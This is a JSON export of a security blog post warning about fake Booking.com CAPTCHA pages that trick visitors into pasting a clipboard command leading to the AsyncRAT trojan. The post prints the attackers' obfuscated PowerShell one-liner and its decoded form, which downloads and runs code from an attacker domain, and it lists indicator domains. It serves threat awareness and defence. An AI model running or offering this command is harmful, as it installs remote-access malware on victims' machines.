{"id":1733,"date":"2025-06-02T16:00:00","date_gmt":"2025-06-02T13:00:00","guid":{"rendered":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/"},"modified":"2025-06-02T16:00:00","modified_gmt":"2025-06-02T13:00:00","slug":"potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains","status":"publish","type":"post","link":"https:\/\/trustcrypt.com\/ar\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/","title":{"rendered":"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains"},"content":{"rendered":"<p>Cybercriminals have launched a campaign targeting users on gaming websites and social media platforms, as well as promoted through sponsored advertisements, directing individuals to counterfeit websites masquerading as Booking.com. Research indicates that a significant portion of travelers, approximately 40%, engage in online searches to book their travels, thereby generating numerous opportunities for cyber scammers.<\/p>\n<p>Initial signs of this campaign emerged in mid-May, with the redirect destination changing every two to three days.<\/p>\n<p>Clicking these links leads users to a familiar tactic where fraudulent CAPTCHA websites hijack clipboard data, attempting to manipulate users into unwittingly infecting their devices.<\/p>\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" width=\"1008\" height=\"613\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2025\/05\/fake<em>booking<\/em>sites_captcha.png&#8221; alt=&#8221;Fake CAPTCHA prompt&#8221; \/><figcaption>Fake CAPTCHA prompt<\/figcaption><\/figure>\n<p>On these particular websites, checking the fake CAPTCHA box grants the site permission to access the clipboard.<\/p>\n<p>Subsequently, the fraudsters seek to have the visitor execute a Run command on their computer. This type of command is atypical in legitimate CAPTCHA forms and should raise immediate suspicion.<\/p>\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" width=\"530\" height=\"554\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2025\/05\/instructions<em>without<\/em>warning.png&#8221; alt=&#8221;Instructions for visitors&#8221; \/><figcaption>Instructions to execute harmful commands<\/figcaption><\/figure>\n<p>Users navigating with Chrome may encounter a warning:<\/p>\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" width=\"317\" height=\"198\" src=\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains-1.webp\" alt=\"Chrome warning message\" \/><figcaption>Chrome warning may lack clarity<\/figcaption><\/figure>\n<p>While the warning is present, its purpose may not be immediately evident to users.<\/p>\n<p>Malwarebytes\u2019 Browser Guard users receive a more explicit warning:<\/p>\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" width=\"479\" height=\"240\" src=\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains-2.webp\" alt=\"Browser Guard clipboard warning\" \/><figcaption>Clipboard warning from Malwarebytes Browser Guard<\/figcaption><\/figure>\n<p>The warning prompts the user with a message regarding clipboard access: \u201cHey, did you just copy something? Your clipboard was accessed from this website. Ensure you trust the source before using this information.\u201d<\/p>\n<p>It is essential not to dismiss these warnings; regardless of the familiarity of the website, the provided instructions should raise red flags.<\/p>\n<p>The content that may have been copied to the clipboard can appear nonsensical to some, while more experienced users will recognize the inherent risks.<\/p>\n<p><code>pOwERsheLl \u2013N\"O\"p\"rO\" \/w h -C\"Om\"ManD \"$b\"a\"np = 'b\"kn\"g\"n\"et.com';$r\"k\"v = I\"n\"v\"o\"k\"e-\"R\"e\"stMethod -Uri $ba\"n\"p;I\"nv\"oke\"-\"E\"xp\"r\"es\"sion $r\"k\"v<\/code><\/p>\n<p>The perpetrators employ techniques such as mixed casing, quote interruptions, and obfuscated variable names to conceal their true intentions. The underlying command, if executed, is as follows:<\/p>\n<p><code>powershell -NoProfile -WindowStyle Hidden -Command \"$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv\"<\/code><\/p>\n<p>The malicious CAPTCHA form instructs the user to paste the clipboard content into the Windows Run dialog and run the command outlined above. When Browser Guard detects potentially harmful commands in the clipboard, it prefixes the copied content with a warning phrase, rendering it an invalid command and preventing infection.<\/p>\n<p>If an unwary user proceeds without protection, the command launches a concealed PowerShell window to download and execute a file named ckjg.exe, which subsequently downloads and executes a file labeled Stub.exe, identified by Malwarebytes as <a href=\"https:\/\/www.malwarebytes.com\/blog\/detections\/backdoor-asyncrat\">Backdoor.AsyncRAT<\/a>.<\/p>\n<p>Backdoor.AsyncRAT is a remote access Trojan designed to remotely monitor and control affected devices, compromising user security and privacy.<\/p>\n<h2>Indicators of Compromise (IOCs)<\/h2>\n<p>Associated domains and subdomains with this campaign exhibit rapid rotation, with modifications occurring every few days. A selection of recently active domains includes:<\/p>\n<ul>\n<li>(booking.)chargesguestescenter[.]com<\/li>\n<li>(booking.)badgustrewivers[.]com<\/li>\n<li>(booking.)property-paids[.]com<\/li>\n<li>(booking.)rewiewqproperty[.]com<\/li>\n<li>(booking.)extranet-listing[.]com<\/li>\n<li>(booking.)guestsalerts[.]com<\/li>\n<li>(booking.)gustescharge[.]com<\/li>\n<li>kvhandelregis[.]com<\/li>\n<li>patheer-moreinfo[.]com<\/li>\n<li>guestalerthelp[.]com<\/li>\n<li>rewiewwselect[.]com<\/li>\n<li>hekpaharma[.]com<\/li>\n<li>bkngnet[.]com<\/li>\n<li>partnervrft[.]com<\/li>\n<\/ul>\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" width=\"800\" height=\"668\" src=\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains-3.webp\" alt=\"Malwarebytes blocks malicious downloads\" \/><figcaption>Malwarebytes blocks download from bkngnet[.]com<\/figcaption><\/figure>\n<h2>Best Practices for Protection<\/h2>\n<p>To safeguard against these and similar threats, consider the following protective measures:<\/p>\n<ul>\n<li>Avoid executing instructions provided by unfamiliar websites without thorough consideration.<\/li>\n<li>Implement a robust anti-malware solution capable of blocking malicious websites and scripts.<\/li>\n<li>Utilize a browser extension that blocks harmful domains and phishing attempts.<\/li>\n<li>Disable JavaScript in your browser when visiting untrusted websites.<\/li>\n<\/ul>\n<p>Clipboard access is initiated by the JavaScript function document.execCommand(\u2018copy\u2019). While disabling JavaScript can prevent clipboard hijacking, it may also interfere with the functionality of many regularly visited sites. A suggested approach is to utilize distinct browsers for varied purposes.<\/p>\n<hr \/>\n<p>Protecting your digital identity is paramount in the face of rising cybersecurity threats. Employ comprehensive measures, including identity protection solutions, to maintain the security and privacy of your personal information.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cybercriminals have launched a campaign targeting users on gaming websites and social media platforms, as well as promoted through sponsored&#8230;<\/p>\n","protected":false},"author":1,"featured_media":1734,"comment_status":"open","ping_status":"closed","sticky":false,"template":"Default","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[28],"tags":[222,751,54],"class_list":["post-1733","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","tag-clipboard","tag-gaming","tag-malware"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains - Trustcrypt<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/trustcrypt.com\/ar\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/\" \/>\n<meta property=\"og:locale\" content=\"ar_AR\" \/>\n<meta property=\"og:locale:alternate\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains\" \/>\n<meta property=\"og:description\" content=\"Cybercriminals have launched a campaign targeting users on gaming websites and social media platforms, as well as promoted through sponsored...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/trustcrypt.com\/ar\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/\" \/>\n<meta property=\"og:site_name\" content=\"Trustcrypt\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-02T13:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains-1.webp\" \/>\n<meta name=\"author\" content=\"Trustscrypt\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u0643\u064f\u062a\u0628 \u0628\u0648\u0627\u0633\u0637\u0629\" \/>\n\t<meta name=\"twitter:data1\" content=\"Trustscrypt\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0648\u0642\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0645\u064f\u0642\u062f\u0651\u0631\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 \u062f\u0642\u0627\u0626\u0642\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/\",\"url\":\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/\",\"name\":\"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains\",\"isPartOf\":{\"@id\":\"https:\/\/trustcrypt.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp\",\"datePublished\":\"2025-06-02T13:00:00+00:00\",\"author\":{\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f\"},\"inLanguage\":\"ar\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ar\",\"@id\":\"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage\",\"url\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp\",\"contentUrl\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp\",\"width\":1792,\"height\":1024,\"caption\":\"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/trustcrypt.com\/#website\",\"url\":\"https:\/\/trustcrypt.com\/\",\"name\":\"Trustcrypt\",\"description\":\"\u0627\u0644\u0623\u0645\u0646 \u0647\u0648 \u0627\u0633\u0645\u0646\u0627 \u0627\u0644\u062b\u0627\u0646\u064a\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/trustcrypt.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ar\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f\",\"name\":\"Trustscrypt\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ar\",\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g\",\"caption\":\"Trustscrypt\"},\"sameAs\":[\"http:\/\/trustcrypt.com\"],\"url\":\"https:\/\/trustcrypt.com\/ar\/author\/trustscrypt\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains - Trustcrypt","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/trustcrypt.com\/ar\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/","og_locale":"ar_AR","og_type":"article","og_title":"[:en]Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains[:] - Trustcrypt","og_description":"Cybercriminals have launched a campaign targeting users on gaming websites and social media platforms, as well as promoted through sponsored...","og_url":"https:\/\/trustcrypt.com\/ar\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/","og_site_name":"Trustcrypt","article_published_time":"2025-06-02T13:00:00+00:00","og_image":[{"url":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains-1.webp","type":"","width":"","height":""}],"author":"Trustscrypt","twitter_card":"summary_large_image","twitter_misc":{"\u0643\u064f\u062a\u0628 \u0628\u0648\u0627\u0633\u0637\u0629":"Trustscrypt","\u0648\u0642\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0645\u064f\u0642\u062f\u0651\u0631":"3 \u062f\u0642\u0627\u0626\u0642"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/","url":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/","name":"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains","isPartOf":{"@id":"https:\/\/trustcrypt.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage"},"image":{"@id":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage"},"thumbnailUrl":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp","datePublished":"2025-06-02T13:00:00+00:00","author":{"@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f"},"inLanguage":"ar","potentialAction":[{"@type":"ReadAction","target":["https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/"]}]},{"@type":"ImageObject","inLanguage":"ar","@id":"https:\/\/trustcrypt.com\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains\/#primaryimage","url":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp","contentUrl":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2025\/06\/potential-asyncrat-infection-risk-following-redirection-to-fraudulent-booking-com-domains.webp","width":1792,"height":1024,"caption":"Potential AsyncRAT Infection Risk Following Redirection to Fraudulent Booking.com Domains"},{"@type":"WebSite","@id":"https:\/\/trustcrypt.com\/#website","url":"https:\/\/trustcrypt.com\/","name":"Trustcrypt","description":"\u0627\u0644\u0623\u0645\u0646 \u0647\u0648 \u0627\u0633\u0645\u0646\u0627 \u0627\u0644\u062b\u0627\u0646\u064a","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/trustcrypt.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ar"},{"@type":"Person","@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f","name":"Trustscrypt","image":{"@type":"ImageObject","inLanguage":"ar","@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g","caption":"Trustscrypt"},"sameAs":["http:\/\/trustcrypt.com"],"url":"https:\/\/trustcrypt.com\/ar\/author\/trustscrypt\/"}]}},"_links":{"self":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts\/1733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/comments?post=1733"}],"version-history":[{"count":0,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts\/1733\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/media\/1734"}],"wp:attachment":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/media?parent=1733"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/categories?post=1733"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/tags?post=1733"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}